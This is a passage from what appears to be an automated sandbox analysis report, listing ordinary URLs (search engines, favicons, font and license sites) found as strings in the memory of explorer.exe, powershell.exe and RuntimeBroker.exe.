Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000018.00000002.391291474.0000027D80001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: RuntimeBroker.exe, 00000027.00000002.584711407.0000017766D3A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.584681538.0000017766D2E000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RuntimeBroker.exe, 00000027.00000002.579872575.0000017766517000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Termsame
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermslonWdtP
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Termslse
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
